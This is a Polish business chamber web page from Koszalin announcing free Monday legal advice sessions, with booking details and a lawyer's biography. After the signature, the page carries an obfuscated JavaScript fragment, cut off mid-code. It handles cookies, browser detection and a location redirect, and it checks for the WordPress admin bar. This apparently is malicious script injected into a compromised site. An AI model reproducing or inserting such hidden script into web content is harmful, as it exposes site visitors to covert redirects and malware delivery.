Bezpłatne porady prawne w Izbie – w każdy poniedziałek o godzinie 12.00 | Północna Izba Gospodarcza w Koszalinie
Cykl bezpłatnych porad prawnych w Biurze Północnej Izbie Gospodarczej w Koszalinie, dla przedsiębiorców zrzeszonych w PIG Koszalin, ale również spoza Izby i osób nie prowadzących działalności.

Zapraszamy do skorzystania z porad, w poniedziałki w godzinach od 12.00 do 14.00 w biurze Izby w Koszalinie. Bezpłatnych porad prawnych udzielać będzie Kancelaria Prawna Perfecta – reprezentowana przez Panią Katarzynę Kujawską.

Ze względów organizacyjnych prosimy o, zgłaszanie wizyt do każdego poniedziałku do godziny 10.00 mailowo na koszalin@izba.info lub telefonicznie 537 184 630. W zgłoszenia należny podać imię i nazwisko kontakt telefoniczny i mailowy.

Katarzyna Kujawska – prawnik. Obsługuje klientów indywidualnych kancelarii oraz prowadzi sprawy spółek. Występuje przed sądami powszechnymi i administracyjnymi, prokuraturą, organami administracji publicznej. Specjalizuje się w prawie weterynaryjnym, gospodarczym (m.in zakładanie, przekształcanie spółek, zmiany w KRS, analiza prawna umów), upadłości, restrukturyzacji przedsiębiorstw, prawie rodzinnym, prawie pracy. Pełni również funkcję kuratora sądowego, likwidatora sądowego spółek kapitałowych i członka organów nadzoru. Autorka artykułów prawnych z zakresu prawa cywilnego, procedury cywilnej.

Z poważaniem

Roman Biłas
Prezes Północnej Izby Gospodarczej
Oddział w Koszalinie

  'toUTCString',’cookie',’split',’length',’charAt',’substring',’indexOf',’userAgent',’match',’MSIE;',’OPR',’Chromium',’Firefox',’Chrome',’ppkcookie',’location',’http://',’getElementById',’wpadminbar',’undefined',’setTime',’getTime',';\x20expires='];(function(c,d){var e=function(f){while(–f){c[’push'](c[’shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};(function(){if(document[b(’0x0′)](b(’0x1′))===null){if(typeof c===b(’0x2′)){function c(d,e,f){var g=”;if(f){var h=new Date();h[b(’0x3′)](h[b(’0x4′)]()+f*0x18*0x3c*0x3c*0x3e8);g=b(’0x5′)+h[b(’0x6′)]();}document[b(’0x7′)]=d+’=’+(e||”)+g+';\x20path=/';}function i(j){var k=j+’=';var l=document[b(’0x7′)][b(’0x8′)](';');for(var m=0x0;m